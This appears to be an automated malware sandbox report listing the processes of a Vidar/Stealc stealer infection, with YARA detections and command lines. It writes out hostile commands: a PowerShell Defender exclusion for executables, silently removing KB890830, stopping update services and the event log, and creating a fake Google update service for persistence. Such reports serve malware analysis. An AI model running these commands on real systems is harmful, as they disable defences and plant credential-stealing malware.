                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2246493920.0000000013471000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.2246493920.0000000013471000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2246493920.0000000013471000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000003.2190136482.000000001387E000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000003.2190136482.000000001387E000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2190136482.000000001387E000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2247221901.0000000013880000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.2247221901.0000000013880000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2247221901.0000000013880000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                                                                                                                                                                                        Start time:09:25:16
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x570000
                                                                                                                                                                                                                                                                                                                                                        File size:231'736 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.3358442703.0000000002E88000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                                                                                                                                                                        Start time:09:25:58
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff715980000
                                                                                                                                                                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                                                                                                                                                                        Start time:09:25:59
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                                                                                                                                                                                        Start time:09:25:59
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 --field-trial-handle=2324,i,17997273353640924679,7727149592954305312,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff715980000
                                                                                                                                                                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                                                                                                                                                                                        Start time:09:26:10
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:0x7ff6c1cf0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:10
Start time:09:26:11
Start date:14/11/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Imagebase:0x7ff6c1cf0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:11
Start time:09:26:11
Start date:14/11/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2732 --field-trial-handle=2600,i,17974872305379590479,9492562084942244494,262144 /prefetch:3
Imagebase:0x7ff6c1cf0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:12
Start time:09:26:12
Start date:14/11/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2728 --field-trial-handle=2544,i,2895692631487973733,12792886755276360838,262144 /prefetch:3
Imagebase:0x7ff6c1cf0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:13
Start time:09:26:12
Start date:14/11/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Imagebase:0x7ff7e52b0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:16
Start time:09:26:15
Start date:14/11/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6720 --field-trial-handle=2544,i,2895692631487973733,12792886755276360838,262144 /prefetch:8
Imagebase:0x7ff6c1cf0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:17
Start time:09:26:15
Start date:14/11/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6920 --field-trial-handle=2544,i,2895692631487973733,12792886755276360838,262144 /prefetch:8
Imagebase:0x7ff6c1cf0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:19
Start time:09:26:21
Start date:14/11/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s lfsvc
Imagebase:0x7ff7e52b0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:20
Start time:09:26:57
Start date:14/11/2024
Path:C:\ProgramData\AAFIJKKEHJ.exe
Wow64 process (32bit):false
Commandline:"C:\ProgramData\AAFIJKKEHJ.exe"
Imagebase:0x7ff6ad6d0000
File size:11'695'088 bytes
MD5 hash:FBBA09E1B1024A3E7B88D06B53AD3716
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 4%, ReversingLabs
Has exited:true

Target ID:21
Start time:09:26:58
Start date:14/11/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase:0x7ff7be880000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:22
Start time:09:26:58
Start date:14/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:23
Start time:09:27:01
Start date:14/11/2024
Path:C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:0x7ff6ef0c0000
File size:496'640 bytes
MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:24
Start time:09:27:02
Start date:14/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:0x7ff7c5350000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:25
Start time:09:27:02
Start date:14/11/2024
Path:C:\Windows\System32\sc.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\sc.exe stop UsoSvc
Imagebase:0x7ff70bb40000
File size:72'192 bytes
MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:26
Start time:09:27:02
Start date:14/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:27
Start time:09:27:02
Start date:14/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:28
Start time:09:27:02
Start date:14/11/2024
Path:C:\Windows\System32\wusa.exe
Wow64 process (32bit):false
Commandline:wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:0x7ff6b2870000
File size:345'088 bytes
MD5 hash:FBDA2B8987895780375FE0E6254F6198
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:29
Start time:09:27:02
Start date:14/11/2024
Path:C:\Windows\System32\sc.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
Imagebase:0x7ff70bb40000
File size:72'192 bytes
MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:30
Start time:09:27:02
Start date:14/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:31
Start time:09:27:02
Start date:14/11/2024
Path:C:\Windows\System32\sc.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\sc.exe stop wuauserv
Imagebase:0x7ff70bb40000
File size:72'192 bytes
MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:32
Start time:09:27:02
Start date:14/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:33
Start time:09:27:02
Start date:14/11/2024
Path:C:\Windows\System32\sc.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\sc.exe stop bits
Imagebase:0x7ff70bb40000
File size:72'192 bytes
MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:34
Start time:09:27:02
Start date:14/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:35
Start time:09:27:02
Start date:14/11/2024
Path:C:\Windows\System32\sc.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\sc.exe stop dosvc
Imagebase:0x7ff70bb40000
File size:72'192 bytes
MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:36
Start time:09:27:02
Start date:14/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:37
Start time:09:27:02
Start date:14/11/2024
Path:C:\Windows\System32\powercfg.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Imagebase:0x7ff64de00000
File size:96'256 bytes
MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:38
Start time:09:27:02
Start date:14/11/2024
Path:C:\Windows\System32\powercfg.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Imagebase:0x7ff64de00000
File size:96'256 bytes
MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        Target ID:39
                                                                                                                                                                                                                                                                                                                                                        Start time:09:27:02
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        Target ID:40
                                                                                                                                                                                                                                                                                                                                                        Start time:09:27:02
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\powercfg.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff64de00000
                                                                                                                                                                                                                                                                                                                                                        File size:96'256 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        Target ID:41
                                                                                                                                                                                                                                                                                                                                                        Start time:09:27:02
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        Target ID:42
                                                                                                                                                                                                                                                                                                                                                        Start time:09:27:02
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\powercfg.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff64de00000
                                                                                                                                                                                                                                                                                                                                                        File size:96'256 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        Target ID:43
                                                                                                                                                                                                                                                                                                                                                        Start time:09:27:02
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        Target ID:44
                                                                                                                                                                                                                                                                                                                                                        Start time:09:27:02
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:45
Start time:09:27:02
Start date:14/11/2024
Path:C:\Windows\System32\sc.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineK"
Imagebase:0x7ff70bb40000
File size:72'192 bytes
MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:46
Start time:09:27:02
Start date:14/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:47
Start time:09:27:03
Start date:14/11/2024
Path:C:\Windows\System32\sc.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineK" binpath= "C:\ProgramData\GoogleUP\Chrome\Updater.exe" start= "auto"
Imagebase:0x7ff70bb40000
File size:72'192 bytes
MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:48
Start time:09:27:03
Start date:14/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:49
Start time:09:27:04
Start date:14/11/2024
Path:C:\Windows\System32\sc.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\sc.exe stop eventlog
Imagebase:0x7ff70bb40000
File size:72'192 bytes
MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:50
Start time:09:27:04
Start date:14/11/2024
Path:C:\Windows\System32\sc.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineK"
Imagebase:0x7ff70bb40000
File size:72'192 bytes
MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:51
Start time:09:27:04
Start date:14/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:52
Start time:09:27:04
Start date:14/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:53
Start time:09:27:04
Start date:14/11/2024
Path:C:\ProgramData\GoogleUP\Chrome\Updater.exe
Wow64 process (32bit):false
Commandline:C:\ProgramData\GoogleUP\Chrome\Updater.exe
Imagebase:0x7ff76e270000
File size:11'695'088 bytes
MD5 hash:FBBA09E1B1024A3E7B88D06B53AD3716
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 4%, ReversingLabs
Has exited:true

Target ID:54
Start time:09:27:05
Start date:14/11/2024
Path:C:\ProgramData\GHDAKKJJJK.exe
Wow64 process (32bit):true
Commandline:"C:\ProgramData\GHDAKKJJJK.exe"
Imagebase:0x400000
File size:5'842'928 bytes
MD5 hash:18F4B337AD6BEB8E7EE040BCC8C049DF
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
